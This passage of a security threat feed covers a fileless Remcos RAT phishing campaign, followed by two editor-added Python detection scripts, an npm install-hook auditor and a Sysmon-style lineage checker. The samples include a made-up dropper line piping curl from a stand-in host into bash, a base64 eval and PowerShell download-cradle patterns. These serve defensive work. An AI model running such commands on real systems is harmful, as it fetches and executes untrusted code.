This type of attack poses a significant challenge to disk-scanning antivirus and to forensic approaches that rely on file artifacts; detecting it depends on endpoint telemetry such as script logging, process lineage and memory or injection events rather than on file signatures. The scope and scale of this campaign are unknown, and the original report does not say whether it was targeted or opportunistic.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn unsuspecting user receives a phishing email containing a malicious attachment or link (specific delivery mechanism not specified).\u003c/li\u003e\n\u003cli\u003eThe user interacts with the malicious content, initiating the first stage of the attack.\u003c/li\u003e\n\u003cli\u003eA script (e.g., PowerShell, VBScript) is executed, likely delivered through the phishing attachment/link.\u003c/li\u003e\n\u003cli\u003eThe script downloads and executes additional payloads directly in memory, avoiding writing files to disk.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload injects Remcos RAT into a legitimate system process (process injection).\u003c/li\u003e\n\u003cli\u003eRemcos RAT establishes a command and control (C2) connection with the attacker\u0026rsquo;s server for further instructions.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform various malicious activities such as data exfiltration, keylogging, or lateral movement.\u003c/li\u003e\n\u003cli\u003eThe Remcos RAT remains resident in memory with no corresponding file on disk, potentially evading detection by signature-based antivirus solutions. A memory-only implant does not survive a reboot unless a separate persistence mechanism is established, and the original report does not describe one.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe successful deployment of Remcos RAT can lead to significant data breaches, intellectual property theft, and financial losses. Victims may experience system instability, unauthorized access to sensitive information, and reputational damage. The fileless nature of the attack makes it harder to detect and remediate, potentially prolonging the dwell time and increasing the overall impact. 
The number of victims and targeted sectors are not specified in the original source.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable PowerShell script block logging (Microsoft-Windows-PowerShell/Operational event 4104) and transcription to gain visibility into potentially malicious script execution, including the decoded contents of encoded or obfuscated commands (reference attack chain step 3).\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for suspicious parent-child relationships (e.g., an Office application spawning \u003ccode\u003epowershell.exe\u003c/code\u003e, or \u003ccode\u003ecmd.exe\u003c/code\u003e or \u003ccode\u003epowershell.exe\u003c/code\u003e spawning uncommon processes) to catch the script and in-memory loader stages (reference attack chain steps 3 and 4). The injection itself (step 5) is better caught by telemetry on cross-process memory writes and remote thread creation, and by a legitimate process that begins making outbound connections it has never made before (step 6).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided below to your SIEM and tune them for your specific environment.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unauthorized or unknown scripts and binaries (reference attack chain step 4).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-15T15:34:12Z","date_published":"2026-03-15T15:34:12Z","id":"/briefs/2024-01-remcos-fileless/","summary":"A fileless multi-stage Remcos RAT is delivered via phishing, achieving memory-resident execution, but specific technical details are not provided in this brief.","title":"Fileless Multi-Stage Remcos RAT via Phishing","url":"https://feed.craftedsignal.io/briefs/2024-01-remcos-fileless/"}],"language":"en","title":"CraftedSignal Threat Feed — Rat","version":"https://jsonfeed.org/version/1.1"}
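Added example for the PylangGhost brief's recommendation to monitor package installations for suspicious install-time scripts. This is editor-supplied code, not CraftedSignal's and not an artifact of the campaign: it walks a node_modules tree, reports every npm lifecycle hook that runs during install, and scores each script body against a small, constructed indicator list. The package names, script bodies and the indicator patterns are invented for illustration; the sample tree is built in a temporary directory so the script runs offline.

```python
"""Audit an npm dependency tree for lifecycle scripts that execute at install time.

Added example, not CraftedSignal's code. Package names, script bodies and the
indicator list are constructed for illustration.
"""
import json
import os
import re
import tempfile
from dataclasses import dataclass, field

# Lifecycle hooks npm runs automatically during `npm install` (unless --ignore-scripts).
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed indicators: tokens legitimate build scripts rarely need but
# install-time droppers commonly use. Tune for your own build tooling.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I), "downloads from the network"),
    (re.compile(r"\bpowershell(\.exe)?\b|\bpwsh\b", re.I), "invokes PowerShell"),
    (re.compile(r"\bnode\s+-e\b|\beval\(", re.I), "evaluates inline code"),
    (re.compile(r"\bbase64\b|atob\(", re.I), "decodes base64"),
    (re.compile(r"https?://\S+", re.I), "contains a URL"),
    (re.compile(r"\b(python3?|bash|sh)\s+-c\b", re.I), "spawns an interpreter with an inline command"),
    (re.compile(r"\bchmod\s+\+x\b|\bcrontab\b|\bschtasks\b|\breg(\.exe)?\s+add\b", re.I), "persistence or execution primitive"),
]


@dataclass
class Finding:
    package: str
    hook: str
    script: str
    reasons: list = field(default_factory=list)


def audit_package_json(path):
    """Return one Finding per install-time hook in a package.json.

    Hooks that match no indicator are still reported, so the reviewer sees every
    piece of code that would run during `npm install`."""
    with open(path, encoding="utf-8") as fh:
        manifest = json.load(fh)
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        body = scripts.get(hook)
        if not body:
            continue
        reasons = [why for rx, why in SUSPICIOUS if rx.search(body)]
        findings.append(Finding(manifest.get("name", path), hook, body, reasons))
    return findings


def audit_tree(root):
    """Walk node_modules (nested and scoped packages included) and collect findings."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" in filenames:
            findings.extend(audit_package_json(os.path.join(dirpath, "package.json")))
    return findings


def flagged_packages(root):
    """Sorted names of packages whose install hooks matched at least one indicator."""
    return sorted({f.package for f in audit_tree(root) if f.reasons})


def build_sample_tree():
    """Construct a throwaway node_modules: one package with no install hook, one
    legitimate native build, and two invented droppers (example data only)."""
    root = tempfile.mkdtemp(prefix="node_modules_")
    samples = {
        "left-pad-ish": {"name": "left-pad-ish", "version": "1.0.0", "scripts": {"test": "node test.js"}},
        "native-thing": {"name": "native-thing", "version": "2.1.0", "scripts": {"install": "node-gyp rebuild"}},
        "@scope/helper": {"name": "@scope/helper", "version": "0.0.3",
                          "scripts": {"postinstall": "node -e \"eval(Buffer.from('...','base64').toString())\""}},
        "img-tools": {"name": "img-tools", "version": "3.2.1",
                      "scripts": {"preinstall": "curl -s http://example.invalid/s.sh | bash"}},
    }
    for name, manifest in samples.items():
        pkg_dir = os.path.join(root, *name.split("/"))
        os.makedirs(pkg_dir, exist_ok=True)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for finding in audit_tree(sample_root):
        status = "SUSPICIOUS" if finding.reasons else "review"
        print(f"[{status}] {finding.package} {finding.hook}: {finding.script}")
        for why in finding.reasons:
            print(f"    - {why}")
```

Point `audit_tree` at a real `node_modules` after `npm ci`; the unflagged `native-thing` entry shows why a blanket `--ignore-scripts` policy needs an allow-list of packages whose build step is genuinely required.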
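Added example for the Remcos brief's recommendations on parent-child process monitoring, PowerShell script visibility and detecting the injection step. This is editor-supplied detection logic, not CraftedSignal's code and not one of the Sigma rules the brief refers to. It runs a handful of rules over constructed Sysmon-style records (EventID 1 for process creation, EventID 8 for remote thread creation); the image paths, command lines and encoded blob are invented, and the rule names and allow-lists are assumptions to be tuned per environment.

```python
"""Flag suspicious process lineage and cross-process thread creation in endpoint telemetry.

Added example, not CraftedSignal's code or Sigma rules. The sample events are
constructed Sysmon-style JSON lines; every path and command line is invented.
"""
import json
import re
from collections import namedtuple

# Parents from which a script host or shell is rarely legitimate (assumed list).
DOCUMENT_HANDLERS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
# Children an interactive shell commonly spawns in admin workflows (assumed allow-list).
BENIGN_SHELL_CHILDREN = {"conhost.exe", "whoami.exe", "ipconfig.exe", "ping.exe", "git.exe", "net.exe"}
# Command-line markers of in-memory download-and-execute loaders (attack chain step 4).
CRADLE = re.compile(
    r"(-enc(odedcommand)?\s+[A-Za-z0-9+/=]{20,}|DownloadString|IEX\b|Invoke-Expression"
    r"|FromBase64String|Reflection\.Assembly)", re.I)

Alert = namedtuple("Alert", "rule event")


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the names of the rules an event matches (empty list if none)."""
    hits = []
    if event["EventID"] == 1:
        image, parent = basename(event["Image"]), basename(event["ParentImage"])
        cmd = event.get("CommandLine", "")
        if parent in DOCUMENT_HANDLERS and image in SCRIPT_HOSTS:
            hits.append("office_spawns_script_host")          # steps 2-3
        if parent in {"powershell.exe", "pwsh.exe", "cmd.exe"} and image not in SCRIPT_HOSTS | BENIGN_SHELL_CHILDREN:
            hits.append("shell_spawns_uncommon_child")         # step 4 fallback to disk
        if image in {"powershell.exe", "pwsh.exe"} and CRADLE.search(cmd):
            hits.append("powershell_download_cradle")          # step 4 in-memory loader
    elif event["EventID"] == 8:
        src, tgt = basename(event["SourceImage"]), basename(event["TargetImage"])
        if src in SCRIPT_HOSTS and src != tgt:
            hits.append("script_host_remote_thread")           # step 5 injection
    return hits


def scan(lines):
    """Run every rule over newline-delimited JSON events; one Alert per (rule, event) hit."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        for rule in evaluate(event):
            alerts.append(Alert(rule, event))
    return alerts


# Constructed telemetry: a benign build, then a phishing-style chain ending in injection.
SAMPLE_EVENTS = """
{"EventID": 1, "Image": "C:\\\\Windows\\\\System32\\\\cmd.exe", "ParentImage": "C:\\\\Program Files\\\\nodejs\\\\node.exe", "CommandLine": "cmd /c npm run build"}
{"EventID": 1, "Image": "C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe", "ParentImage": "C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE", "CommandLine": "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"EventID": 1, "Image": "C:\\\\Windows\\\\System32\\\\conhost.exe", "ParentImage": "C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe", "CommandLine": "conhost.exe 0xffffffff"}
{"EventID": 1, "Image": "C:\\\\Users\\\\Public\\\\update.exe", "ParentImage": "C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe", "CommandLine": "update.exe"}
{"EventID": 8, "SourceImage": "C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe", "TargetImage": "C:\\\\Windows\\\\System32\\\\svchost.exe", "TargetProcessId": 1337}
{"EventID": 1, "Image": "C:\\\\Windows\\\\System32\\\\whoami.exe", "ParentImage": "C:\\\\Windows\\\\System32\\\\cmd.exe", "CommandLine": "whoami /all"}
"""


def rule_counts(text=SAMPLE_EVENTS):
    """Rule name -> number of hits over the given newline-delimited events."""
    counts = {}
    for alert in scan(text.splitlines()):
        counts[alert.rule] = counts.get(alert.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS.splitlines()):
        print(f"{alert.rule}: {alert.event.get('Image', alert.event.get('SourceImage'))}")
```

The first and last sample events (a build spawned by `node.exe`, `whoami` under `cmd.exe`) are there to show the allow-lists doing their job; the `cmd.exe` child rule is deliberately narrow because an unbounded "shell spawns process" rule is unusable in a developer estate. The remote-thread rule is the one that actually speaks to step 5: parent-child lineage does not change when code is injected into an already-running process.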
